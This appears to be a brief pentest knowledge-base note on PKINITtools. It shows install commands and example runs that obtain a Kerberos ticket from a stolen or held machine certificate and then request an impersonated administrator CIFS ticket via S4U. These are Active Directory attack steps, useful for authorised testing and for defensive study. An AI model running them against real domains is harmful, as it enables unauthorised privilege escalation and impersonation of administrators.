PKINITTools

Install

cd /opt/
git clone https://github.com/dirkjanm/PKINITtools.git
cd PKINITtools
virtualenv -p python3 env
source env/bin/activate
python3 -m pip install -r requirements.txt

gettgtpkinit.py

This tool is used to gather a machine ticket using a machine certificate.

python3 gettgtpkinit.py -cert-pfx VlQaF13b.pfx -pfx-pass B2eQ4h9S4IgU1eeQ2OMb example.com/DB-SRV01$ db-srv01.ccache

gets4uticket.py

This tool is used to request an impersonated service principal ticket that is constrained to the machine you own.

Note:

you can get away with requesting the kerberos ccache file against a dc IP address like kerberos+ccache://example.com\\db-srv01\$:db-srv01.ccache@10.10.10.10
but, the cifs entry below must be cifs/ a valid machine UPN

python3 gets4uticket.py kerberos+ccache://example.com\\db-srv01\$:db-srv01.ccache@dc01.example.com cifs/db-srv01.example.com@example.com administrator@example.com admin.ccache

Antisyphon KB

Explorer

PKINITTools

Install

gettgtpkinit.py

gets4uticket.py

Note:

Graph View

Table of Contents

Backlinks